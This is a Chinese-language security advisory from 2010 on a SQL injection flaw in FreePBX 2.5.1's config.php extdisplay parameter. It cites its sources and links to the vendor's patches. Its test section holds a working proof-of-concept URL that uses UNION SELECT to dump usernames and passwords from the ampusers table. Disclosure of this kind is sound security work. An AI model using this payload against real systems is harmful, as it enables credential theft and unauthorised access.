发布日期：2010-01-18
更新日期：2010-01-19

受影响系统：

FreePBX FreePBX 2.5.1

不受影响系统：

FreePBX FreePBX 2.5.2

描述：

---

BUGTRAQ  ID: 37847

FreePBX之前被称为Asterisk Management Portal，是IP电话工具Asterisk的标准化实现，可提供Web配置界面和其他工具。

FreePBX没有正确地过滤提交给config.php页面的extdisplay参数，远程攻击者可以通过提交恶意的查询请求执行SQL注入攻击。

<*来源：Ivan Huertas
  
  链接：http://marc.info/?l=full-disclosure&m=126385082917779&w=2
        http://secunia.com/advisories/38299/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://xxx.xxx.xxx.xxx/admin/config.php?display=did&didfilter=&extdisplay=12%22%20union%20select%20username,password,sections,%221%22,%222%22,%223%22,%224%22,%225%22,%226%22,%227%22,%228%22,%229%22,%2210%22,%2211%22,%2212%22%20from%20ampusers%20where%20%22%22=%22

建议：

---

厂商补丁：

FreePBX
-------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.freepbx.org/trac/changeset/7594
http://www.freepbx.org/trac/changeset/7640

浏览次数：3191
严重程度：0（网友投票）